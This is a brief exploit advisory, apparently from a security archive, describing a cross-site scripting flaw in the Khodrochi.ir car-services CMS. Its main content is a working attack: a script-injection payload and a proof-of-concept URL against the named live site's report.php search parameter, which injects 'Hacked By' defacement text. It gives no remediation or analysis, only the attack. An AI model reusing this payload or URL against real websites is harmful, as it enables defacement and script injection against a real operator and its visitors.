Khodrochi.ir CMS - Iranian Car Services Platform - XSS

2022.05.29
ir Mr.B3nY (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========================================================= # Exploit Title: Khodrochi.ir CMS - Iranian Car Services Platform - XSS # Google Dork: - # Date: 2022-05-27 # Exploit Author: Mr.B3nY # Vendor Homepage: www.khodrochi.ir # Tested on: Parrot OS # Vulnerability : Cross Site Scripting (XSS) ========================================================= [+] PAYLOAD : "<script>alert("XSS BY Mr.B3nY")</script> ========================================================= [+] POC :- https://khodrochi.ir/specification/report.php?q="<p style="text-align:center;font-size:5rem">Hacked By Mr.B3nY</p><!-- =========================================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top